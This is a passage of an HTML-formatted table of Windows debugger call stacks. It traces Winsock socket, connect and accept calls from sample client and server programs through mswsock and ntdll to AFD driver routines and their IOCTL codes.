<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12003)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12007)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockDoConnectReal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile (</span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Afd \\Endpoint</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12010)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockPostProcessConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!SockDoConnectReal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">06 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12037)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockCoreAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockCoreAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
